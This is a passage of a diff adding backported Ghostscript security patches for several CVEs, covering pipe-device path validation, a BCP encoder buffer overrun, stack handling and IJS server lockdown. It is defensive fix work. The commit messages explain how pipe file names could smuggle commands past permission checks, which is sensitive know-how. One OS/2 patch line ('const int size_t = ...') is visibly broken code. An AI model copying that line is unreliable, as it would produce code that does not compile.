f[gp_file_name_sizeof]; + const int pipe = 124; /* ASCII code for '|' */ + const int len = strlen(fname); +- int i; ++ int i, code; + + /* Be sure the string copy will fit */ + if (len >= gp_file_name_sizeof) +@@ -694,8 +698,6 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) + /* Try to rewrite any %d (or similar) in the string */ + for (i = 0; i < len; i++) { + if (f[i] == pipe) { +- int code; +- + fp = &f[i + 1]; + /* Because we potentially have to check file permissions at two levels + for the output file (gx_device_open_output_file and the low level +@@ -704,6 +706,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) + the pipe_fopen(), the leading '|' has been stripped. + */ + code = gs_remove_control_path(mem, gs_permit_file_writing, f); ++ if (code < 0) ++ return code; ++ code = gs_remove_control_path(mem, gs_permit_file_control, f); + if (code < 0) + return code; + break; +@@ -711,6 +716,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) + if (!IS_WHITESPACE(f[i])) + break; + } ++ code = gs_remove_control_path(mem, gs_permit_file_control, fp); ++ if (code < 0) ++ return code; + return gs_remove_control_path(mem, gs_permit_file_writing, fp); + } + +-- +2.25.1 diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch new file mode 100644 index 0000000000..beade79eef --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch @@ -0,0 +1,37 @@ +From 9daf042fd7bb19e93388d89d9686a2fa4496f382 Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Mon, 24 Aug 2020 09:24:31 +0100 +Subject: [PATCH] Coverity 361429: move "break" to correct place. + +We had to add the outputfile to the "control" file permission list (as well +as write), but for the "pipe" case, I accidentally added the call after the +break out of loop that checks for a pipe. + +CVE: CVE-2021-3781 + +Upstream-Status: Backport: +https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=9daf042fd7bb19e93388d89d9686a2fa4496f382 + +Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com> +--- + base/gslibctx.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/base/gslibctx.c b/base/gslibctx.c +index ff8fc895e..63dfbe2e0 100644 +--- a/base/gslibctx.c ++++ b/base/gslibctx.c +@@ -668,10 +668,10 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) + code = gs_add_control_path(mem, gs_permit_file_writing, f); + if (code < 0) + return code; +- break; + code = gs_add_control_path(mem, gs_permit_file_control, f); + if (code < 0) + return code; ++ break; + } + if (!IS_WHITESPACE(f[i])) + break; +-- +2.25.1 diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch new file mode 100644 index 0000000000..e3f9e81c45 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch @@ -0,0 +1,238 @@ +From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Tue, 7 Sep 2021 20:36:12 +0100 +Subject: [PATCH] Bug 704342: Include device specifier strings in access + validation + +for the "%pipe%", %handle%" and %printer% io devices. + +We previously validated only the part after the "%pipe%" Postscript device +specifier, but this proved insufficient. + +This rebuilds the original file name string, and validates it complete. The +slight complication for "%pipe%" is it can be reached implicitly using +"|" so we have to check both prefixes. + +Addresses CVE-2021-3781 + +CVE: CVE-2021-3781 + +Upstream-Status: Backport: +https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a9bd3dec9fde + +Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com> +--- + base/gdevpipe.c | 22 +++++++++++++++- + base/gp_mshdl.c | 11 +++++++- + base/gp_msprn.c | 10 ++++++- + base/gp_os2pr.c | 13 +++++++++- + base/gslibctx.c | 69 ++++++++++--------------------------------------- + 5 files changed, 65 insertions(+), 60 deletions(-) + +diff --git a/base/gdevpipe.c b/base/gdevpipe.c +index 96d71f5d8..5bdc485be 100644 +--- a/base/gdevpipe.c ++++ b/base/gdevpipe.c +@@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access, + #else + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ /* The pipe device can be reached in two ways, explicltly with %pipe% ++ or implicitly with "|", so we have to check for both ++ */ ++ char f[gp_file_name_sizeof]; ++ const char *pipestr = "|"; ++ const size_t pipestrlen = strlen(pipestr); ++ const size_t preflen = strlen(iodev->dname); ++ const size_t nlen = strlen(fname); ++ int code1; ++ ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(f, iodev->dname, preflen); ++ memcpy(f + preflen, fname, nlen + 1); ++ ++ code1 = gp_validate_path(mem, f, access); ++ ++ memcpy(f, pipestr, pipestrlen); ++ memcpy(f + pipestrlen, fname, nlen + 1); + +- if (gp_validate_path(mem, fname, access) != 0) ++ if (code1 != 0 && gp_validate_path(mem, f, access) != 0 ) + return gs_error_invalidfileaccess; + + /* +diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c +index 2b964ed74..8d87ceadc 100644 +--- a/base/gp_mshdl.c ++++ b/base/gp_mshdl.c +@@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access, + long hfile; /* Correct for Win32, may be wrong for Win64 */ + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ char f[gp_file_name_sizeof]; ++ const size_t preflen = strlen(iodev->dname); ++ const size_t nlen = strlen(fname); + +- if (gp_validate_path(mem, fname, access) != 0) ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(f, iodev->dname, preflen); ++ memcpy(f + preflen, fname, nlen + 1); ++ ++ if (gp_validate_path(mem, f, access) != 0) + return gs_error_invalidfileaccess; + + /* First we try the open_handle method. */ +diff --git a/base/gp_msprn.c b/base/gp_msprn.c +index ed4827968..746a974f7 100644 +--- a/base/gp_msprn.c ++++ b/base/gp_msprn.c +@@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access, + unsigned long *ptid = &((tid_t *)(iodev->state))->tid; + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ const size_t preflen = strlen(iodev->dname); ++ const size_t nlen = strlen(fname); + +- if (gp_validate_path(mem, fname, access) != 0) ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(pname, iodev->dname, preflen); ++ memcpy(pname + preflen, fname, nlen + 1); ++ ++ if (gp_validate_path(mem, pname, access) != 0) + return gs_error_invalidfileaccess; + + /* First we try the open_printer method. */ +diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c +index f852c71fc..ba54cde66 100644 +--- a/base/gp_os2pr.c ++++ b/base/gp_os2pr.c +@@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access, + FILE ** pfile, char *rfname, uint rnamelen) + { + os2_printer_t *pr = (os2_printer_t *)iodev->state; +- char driver_name[256]; ++ char driver_name[gp_file_name_sizeof]; + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ const size_t preflen = strlen(iodev->dname); ++ const int size_t = strlen(fname); ++ ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(driver_name, iodev->dname, preflen); ++ memcpy(driver_name + preflen, fname, nlen + 1); ++ ++ if (gp_validate_path(mem, driver_name, access) != 0) ++ return gs_error_invalidfileaccess; + + /* First we try the open_printer method. */ + /* Note that the loop condition here ensures we don't +diff --git a/base/gslibctx.c b/base/gslibctx.c +index 6dfed6cd5..318039fad 100644 +--- a/base/gslibctx.c ++++ b/base/gslibctx.c +@@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s) + int + gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) + { +- char *fp, f[gp_file_name_sizeof]; +- const int pipe = 124; /* ASCII code for '|' */ +- const int len = strlen(fname); +- int i, code; ++ char f[gp_file_name_sizeof]; ++ int code; + + /* Be sure the string copy will fit */ +- if (len >= gp_file_name_sizeof) ++ if (strlen(fname) >= gp_file_name_sizeof) + return gs_error_rangecheck; + strcpy(f, fname); +- fp = f; + /* Try to rewrite any %d (or similar) in the string */ + rewrite_percent_specifiers(f); +- for (i = 0; i < len; i++) { +- if (f[i] == pipe) { +- fp = &f[i + 1]; +- /* Because we potentially have to check file permissions at two levels +- for the output file (gx_device_open_output_file and the low level +- fopen API, if we're using a pipe, we have to add both the full string, +- (including the '|', and just the command to which we pipe - since at +- the pipe_fopen(), the leading '|' has been stripped. +- */ +- code = gs_add_control_path(mem, gs_permit_file_writing, f); +- if (code < 0) +- return code; +- code = gs_add_control_path(mem, gs_permit_file_control, f); +- if (code < 0) +- return code; +- break; +- } +- if (!IS_WHITESPACE(f[i])) +- break; +- } +- code = gs_add_control_path(mem, gs_permit_file_control, fp); ++ ++ code = gs_add_control_path(mem, gs_permit_file_control, f); + if (code < 0) + return code; +- return gs_add_control_path(mem, gs_permit_file_writing, fp); ++ return gs_add_control_path(mem, gs_permit_file_writing, f); + } + + int + gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) + { +- char *fp, f[gp_file_name_sizeof]; +- const int pipe = 124; /* ASCII code for '|' */ +- const int len = strlen(fname); +- int i, code; ++ char f[gp_file_name_sizeof]; ++ int code; + + /* Be sure the string copy will fit */ +- if (len >= gp_file_name_sizeof) ++ if (strlen(fname) >= gp_file_name_sizeof) + return gs_error_rangecheck; + strcpy(f, fname); +- fp = f; + /* Try to rewrite any %d (or similar) in the string */ +- for (i = 0; i < len; i++) { +- if (f[i] == pipe) { +- fp = &f[i + 1]; +- /* Because we potentially have to check file permissions at two levels +- for the output file (gx_device_open_output_file and the low level +- fopen API, if we're using a pipe, we have to add both the full string, +- (including the '|', and just the command to which we pipe - since at +- the pipe_fopen(), the leading '|' has been stripped. +- */ +- code = gs_remove_control_path(mem, gs_permit_file_writing, f); +- if (code < 0) +- return code; +- code = gs_remove_control_path(mem, gs_permit_file_control, f); +- if (code < 0) +- return code; +- break; +- } +- if (!IS_WHITESPACE(f[i])) +- break; +- } +- code = gs_remove_control_path(mem, gs_permit_file_control, fp); ++ rewrite_percent_specifiers(f); ++ ++ code = gs_remove_control_path(mem, gs_permit_file_control, f); + if (code < 0) + return code; +- return gs_remove_control_path(mem, gs_permit_file_writing, fp); ++ return gs_remove_control_path(mem, gs_permit_file_writing, f); + } + + int +-- +2.25.1 diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch new file mode 100644 index 0000000000..f312f89e04 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch @@ -0,0 +1,65 @@ +From 6643ff0cb837db3eade489ffff21e3e92eee2ae0 Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Fri, 28 Jan 2022 08:21:19 +0000 +Subject: [PATCH] [PATCH] Bug 703902: Fix op stack management in + sampled_data_continue() + +Replace pop() (which does no checking, and doesn't handle stack extension +blocks) with ref_stack_pop() which does do all that. + +We still use pop() in one case (it's faster), but we have to later use +ref_stack_pop() before calling sampled_data_sample() which also accesses the +op stack. + +Fixes: +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=34675 + +Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=2a3129365d3bc0d4a41f107ef175920d1505d1f7] +CVE: CVE-2021-45949 +Signed-off-by: Minjae Kim <flowergom@gmail.com> +--- + psi/zfsample.c | 13 ++++++++----- + 1 file changed, 8 insertions(+), 5 deletions(-) + +diff --git a/psi/zfsample.c b/psi/zfsample.c +index 0023fa4..f84671f 100644 +--- a/psi/zfsample.c ++++ b/psi/zfsample.c +@@ -534,14 +534,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p) + data_ptr[bps * i + j] = (byte)(cv >> ((bps - 1 - j) * 8)); /* MSB first */ + } + pop(num_out); /* Move op to base of result values */ +- ++ /* From here on, we have to use ref_stack_pop() rather than pop() ++ so that it handles stack extension blocks properly, before calling ++ sampled_data_sample() which also uses the op stack. ++ */ + /* Check if we are done collecting data. */ + + if (increment_cube_indexes(params, penum->indexes)) { + if (stack_depth_adjust == 0) +- pop(O_STACK_PAD); /* Remove spare stack space */ ++ ref_stack_pop(&o_stack, O_STACK_PAD); /* Remove spare stack space */ + else +- pop(stack_depth_adjust - num_out); ++ ref_stack_pop(&o_stack, stack_depth_adjust - num_out); + /* Execute the closing procedure, if given */ + code = 0; + if (esp_finish_proc != 0) +@@ -554,11 +557,11 @@ sampled_data_continue(i_ctx_t *i_ctx_p) + if ((O_STACK_PAD - stack_depth_adjust) < 0) { + stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust); + check_op(stack_depth_adjust); +- pop(stack_depth_adjust); ++ ref_stack_pop(&o_stack, stack_depth_adjust); + } + else { + check_ostack(O_STACK_PAD - stack_depth_adjust); +- push(O_STACK_PAD - stack_depth_adjust); ++ ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust); + for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++) + make_null(op - i); + } +-- +2.17.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch new file mode 100644 index 0000000000..852f2459f7 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch @@ -0,0 +1,54 @@ +From 37ed5022cecd584de868933b5b60da2e995b3179 Mon Sep 17 00:00:00 2001 +From: Ken Sharp <ken.sharp@artifex.com> +Date: Fri, 24 Mar 2023 13:19:57 +0000 +Subject: [PATCH] Graphics library - prevent buffer overrun in (T)BCP encoding + +Bug #706494 "Buffer Overflow in s_xBCPE_process" + +As described in detail in the bug report, if the write buffer is filled +to one byte less than full, and we then try to write an escaped +character, we overrun the buffer because we don't check before +writing two bytes to it. + +This just checks if we have two bytes before starting to write an +escaped character and exits if we don't (replacing the consumed byte +of the input). + +Up for further discussion; why do we even permit a BCP encoding filter +anyway ? I think we should remove this, at least when SAFER is true. + +Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=37ed5022cecd584de868933b5b60da2e995b3179] +CVE: CVE-2023-28879 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + base/sbcp.c | 10 +++++++++- + 1 file changed, 9 insertions(+), 1 deletion(-) + +diff --git a/base/sbcp.c b/base/sbcp.c +index 6b0383c..90784b5 100644 +--- a/base/sbcp.c ++++ b/base/sbcp.c +@@ -1,4 +1,4 @@ +-/* Copyright (C) 2001-2019 Artifex Software, Inc. ++/* Copyright (C) 2001-2023 Artifex Software, Inc. + All Rights Reserved. + + This software is provided AS-IS with no warranty, either express or +@@ -50,6 +50,14 @@ s_xBCPE_process(stream_state * st, stream_cursor_read * pr, + byte ch = *++p; + + if (ch <= 31 && escaped[ch]) { ++ /* Make sure we have space to store two characters in the write buffer, ++ * if we don't then exit without consuming the input character, we'll process ++ * that on the next time round. ++ */ ++ if (pw->limit - q < 2) { ++ p--; ++ break; ++ } + if (p == rlimit) { + p--; + break; +-- +2.25.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch new file mode 100644 index 0000000000..a3bbe958eb --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch @@ -0,0 +1,145 @@ +From 5e65eeae225c7d02d447de5abaf4a8e6d234fcea Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Wed, 7 Jun 2023 10:23:06 +0100 +Subject: [PATCH] Bug 706761: Don't "reduce" %pipe% file names for permission validation + +For regular file names, we try to simplfy relative paths before we use them. + +Because the %pipe% device can, effectively, accept command line calls, we +shouldn't be simplifying that string, because the command line syntax can end +up confusing the path simplifying code. That can result in permitting a pipe +command which does not match what was originally permitted. + +Special case "%pipe" in the validation code so we always deal with the entire +string. + +Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=505eab7782b429017eb434b2b95120855f2b0e3c] +CVE: CVE-2023-36664 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + base/gpmisc.c | 31 +++++++++++++++++++-------- + base/gslibctx.c | 56 ++++++++++++++++++++++++++++++++++++------------- + 2 files changed, 64 insertions(+), 23 deletions(-) + +diff --git a/base/gpmisc.c b/base/gpmisc.c +index c4fffae..09ac6b3 100644 +--- a/base/gpmisc.c ++++ b/base/gpmisc.c +@@ -1046,16 +1046,29 @@ gp_validate_path_len(const gs_memory_t *mem, + && !memcmp(path + cdirstrl, dirsepstr, dirsepstrl)) { + prefix_len = 0; + } +- rlen = len+1; +- bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path"); +- if (bufferfull == NULL) +- return gs_error_VMerror; +- +- buffer = bufferfull + prefix_len; +- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) +- return gs_error_invalidfileaccess; +- buffer[rlen] = 0; + ++ /* "%pipe%" do not follow the normal rules for path definitions, so we ++ don't "reduce" them to avoid unexpected results ++ */ ++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) { ++ bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path"); ++ if (buffer == NULL) ++ return gs_error_VMerror; ++ memcpy(buffer, path, len); ++ buffer[len] = 0; ++ rlen = len; ++ } ++ else { ++ rlen = len+1; ++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path"); ++ if (bufferfull == NULL) ++ return gs_error_VMerror; ++ ++ buffer = bufferfull + prefix_len; ++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) ++ return gs_error_invalidfileaccess; ++ buffer[rlen] = 0; ++ } + while (1) { + switch (mode[0]) + { +diff --git a/base/gslibctx.c b/base/gslibctx.c +index 20c5eee..355c0e3 100644 +--- a/base/gslibctx.c ++++ b/base/gslibctx.c +@@ -719,14 +719,28 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch + return gs_error_rangecheck; + } + +- rlen = len+1; +- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path"); +- if (buffer == NULL) +- return gs_error_VMerror; ++ /* "%pipe%" do not follow the normal rules for path definitions, so we ++ don't "reduce" them to avoid unexpected results ++ */ ++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) { ++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len"); ++ if (buffer == NULL) ++ return gs_error_VMerror; ++ memcpy(buffer, path, len); ++ buffer[len] = 0; ++ rlen = len; ++ } ++ else { ++ rlen = len + 1; + +- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) +- return gs_error_invalidfileaccess; +- buffer[rlen] = 0; ++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_add_control_path_len"); ++ if (buffer == NULL) ++ return gs_error_VMerror; ++ ++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) ++ return gs_error_invalidfileaccess; ++ buffer[rlen] = 0; ++ } + + n = control->num; + for (i = 0; i < n; i++) +@@ -802,14 +816,28 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const + return gs_error_rangecheck; + } + +- rlen = len+1; +- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path"); +- if (buffer == NULL) +- return gs_error_VMerror; ++ /* "%pipe%" do not follow the normal rules for path definitions, so we ++ don't "reduce" them to avoid unexpected results ++ */ ++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) { ++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len"); ++ if (buffer == NULL) ++ return gs_error_VMerror; ++ memcpy(buffer, path, len); ++ buffer[len] = 0; ++ rlen = len; ++ } ++ else { ++ rlen = len+1; + +- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) +- return gs_error_invalidfileaccess; +- buffer[rlen] = 0; ++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_remove_control_path_len"); ++ if (buffer == NULL) ++ return gs_error_VMerror; ++ ++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) ++ return gs_error_invalidfileaccess; ++ buffer[rlen] = 0; ++ } + + n = control->num; + for (i = 0; i < n; i++) { +-- +2.25.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch new file mode 100644 index 0000000000..e8c42f1deb --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch @@ -0,0 +1,60 @@ +From fb342fdb60391073a69147cb71af1ac416a81099 Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Wed, 14 Jun 2023 09:08:12 +0100 +Subject: [PATCH] Bug 706778: 706761 revisit + +Two problems with the original commit. The first a silly typo inverting the +logic of a test. + +The second was forgetting that we actually actually validate two candidate +strings for pipe devices. One with the expected "%pipe%" prefix, the other +using the pipe character prefix: "|". + +This addresses both those. + +Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=fb342fdb60391073a69147cb71af1ac416a81099] +CVE: CVE-2023-36664 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + base/gpmisc.c | 2 +- + base/gslibctx.c | 4 ++-- + 2 files changed, 3 insertions(+), 3 deletions(-) + +diff --git a/base/gpmisc.c b/base/gpmisc.c +index 09ac6b3..01d449f 100644 +--- a/base/gpmisc.c ++++ b/base/gpmisc.c +@@ -1050,7 +1050,7 @@ gp_validate_path_len(const gs_memory_t *mem, + /* "%pipe%" do not follow the normal rules for path definitions, so we + don't "reduce" them to avoid unexpected results + */ +- if (len > 5 && memcmp(path, "%pipe", 5) != 0) { ++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) { + bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path"); + if (buffer == NULL) + return gs_error_VMerror; +diff --git a/base/gslibctx.c b/base/gslibctx.c +index 355c0e3..d8f74a3 100644 +--- a/base/gslibctx.c ++++ b/base/gslibctx.c +@@ -722,7 +722,7 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch + /* "%pipe%" do not follow the normal rules for path definitions, so we + don't "reduce" them to avoid unexpected results + */ +- if (len > 5 && memcmp(path, "%pipe", 5) != 0) { ++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) { + buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len"); + if (buffer == NULL) + return gs_error_VMerror; +@@ -819,7 +819,7 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const + /* "%pipe%" do not follow the normal rules for path definitions, so we + don't "reduce" them to avoid unexpected results + */ +- if (len > 5 && memcmp(path, "%pipe", 5) != 0) { ++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) { + buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len"); + if (buffer == NULL) + return gs_error_VMerror; +-- +2.25.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch new file mode 100644 index 0000000000..662736bb3d --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch @@ -0,0 +1,62 @@ +From 4ceaf92815302863a8c86fcfcf2347e0118dd3a5 Mon Sep 17 00:00:00 2001 +From: Ray Johnston <ray.johnston@artifex.com> +Date: Tue, 22 Sep 2020 13:10:04 -0700 +Subject: [PATCH] Fix gp_file allocations to use thread_safe_memory. + +The gpmisc.c does allocations for gp_file objects and buffers used by +gp_fprintf, as well as gp_validate_path_len. The helgrind run with +-dBGPrint -dNumRenderingThreads=4 and PCL input showed up the gp_fprintf +problem since the clist rendering would call gp_fprintf using the same +allocator (PCL's chunk allocator which is non_gc_memory). The chunk +allocator is intentionally not thread safe (for performance). + +Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4ceaf92815302863a8c86fcfcf2347e0118dd3a5] +CVE: CVE-2023-36664 #Dependency Patch1 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + base/gpmisc.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/base/gpmisc.c b/base/gpmisc.c +index 34cd71f..c4fffae 100644 +--- a/base/gpmisc.c ++++ b/base/gpmisc.c +@@ -435,7 +435,7 @@ generic_pwrite(gp_file *f, size_t count, gs_offset_t offset, const void *buf) + + gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t size, const char *cname) + { +- gp_file *file = (gp_file *)gs_alloc_bytes(mem->non_gc_memory, size, cname ? cname : "gp_file"); ++ gp_file *file = (gp_file *)gs_alloc_bytes(mem->thread_safe_memory, size, cname ? cname : "gp_file"); + if (file == NULL) + return NULL; + +@@ -449,7 +449,7 @@ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t + memset(((char *)file)+sizeof(*prototype), + 0, + size - sizeof(*prototype)); +- file->memory = mem->non_gc_memory; ++ file->memory = mem->thread_safe_memory; + + return file; + } +@@ -1047,7 +1047,7 @@ gp_validate_path_len(const gs_memory_t *mem, + prefix_len = 0; + } + rlen = len+1; +- bufferfull = (char *)gs_alloc_bytes(mem->non_gc_memory, rlen + prefix_len, "gp_validate_path"); ++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path"); + if (bufferfull == NULL) + return gs_error_VMerror; + +@@ -1093,7 +1093,7 @@ gp_validate_path_len(const gs_memory_t *mem, + break; + } + +- gs_free_object(mem->non_gc_memory, bufferfull, "gp_validate_path"); ++ gs_free_object(mem->thread_safe_memory, bufferfull, "gp_validate_path"); + #ifdef EACCES + if (code == gs_error_invalidfileaccess) + errno = EACCES; +-- +2.25.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch new file mode 100644 index 0000000000..3acb8a503c --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch @@ -0,0 +1,62 @@ +From 8b0f20002536867bd73ff4552408a72597190cbe Mon Sep 17 00:00:00 2001 +From: Ken Sharp <ken.sharp@artifex.com> +Date: Thu, 24 Aug 2023 15:24:35 +0100 +Subject: [PATCH] IJS device - try and secure the IJS server startup + +Bug #707051 ""ijs" device can execute arbitrary commands" + +The problem is that the 'IJS' device needs to start the IJS server, and +that is indeed an arbitrary command line. There is (apparently) no way +to validate it. Indeed, this is covered quite clearly in the comments +at the start of the source: + + * WARNING: The ijs server can be selected on the gs command line + * which is a security risk, since any program can be run. + +Previously this used the awful LockSafetyParams hackery, which we +abandoned some time ago because it simply couldn't be made secure (it +was implemented in PostScript and was therefore vulnerable to PostScript +programs). + +This commit prevents PostScript programs switching to the IJS device +after SAFER has been activated, and prevents changes to the IjsServer +parameter after SAFER has been activated. + +SAFER is activated, unless explicitly disabled, before any user +PostScript is executed which means that the device and the server +invocation can only be configured on the command line. This does at +least provide minimal security against malicious PostScript programs. + +Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5] +CVE: CVE-2023-43115 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + devices/gdevijs.c | 5 ++++- + 1 file changed, 4 insertions(+), 1 deletion(-) + +diff --git a/devices/gdevijs.c b/devices/gdevijs.c +index 3d337c5..e50d69f 100644 +--- a/devices/gdevijs.c ++++ b/devices/gdevijs.c +@@ -934,6 +934,9 @@ gsijs_finish_copydevice(gx_device *dev, const gx_device *from_dev) + static const char rgb[] = "DeviceRGB"; + gx_device_ijs *ijsdev = (gx_device_ijs *)dev; + ++ if (ijsdev->memory->gs_lib_ctx->core->path_control_active) ++ return_error(gs_error_invalidaccess); ++ + code = gx_default_finish_copydevice(dev, from_dev); + if(code < 0) + return code; +@@ -1363,7 +1366,7 @@ gsijs_put_params(gx_device *dev, gs_param_list *plist) + if (code >= 0) + code = gsijs_read_string(plist, "IjsServer", + ijsdev->IjsServer, sizeof(ijsdev->IjsServer), +- dev->LockSafetyParams, is_open); ++ ijsdev->memory->gs_lib_ctx->core->path_control_active, is_open); + + if (code >= 0) + code = gsijs_read_string_malloc(plist, "DeviceManufacturer", +-- +2.25.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch new file mode 100644 index 0000000000..77eec7d158 --- /dev/null +++ 